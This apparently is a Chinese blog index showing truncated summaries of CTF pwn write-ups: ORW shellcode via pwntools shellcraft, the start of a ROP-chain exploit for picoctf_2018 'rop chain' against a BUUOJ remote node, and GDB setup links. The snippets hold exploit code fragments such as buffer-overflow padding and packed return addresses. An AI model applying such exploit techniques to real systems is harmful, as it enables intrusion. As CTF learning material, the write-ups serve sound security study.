摘要:
写shellcode,由于我还没开始写反汇编引擎,所以直接去百度了下 把提权函数给ban了,所以只能直接读取flag,看了下pwnki师傅的博客 学到了shellcraft的新花样,有意思 from pwn import * #p=process('./orw') p=remote('node3.b 阅读全文
摘要:
picoctf_2018_rop chain rop from pwn import * p=remote('node3.buuoj.cn',25933) p.recvuntil('input> ') payload=b'p'*0x18+b'pppp'+p32(0x80485CB)+p32(0x80 阅读全文
摘要:
https://www.jianshu.com/p/1a966b62b3d4 https://xuanxuanblingbling.github.io/ctf/tools/2020/03/20/gdb/ 或者这样编译 sudo gcc test.c -o test -Wl,-I /home/lukb 阅读全文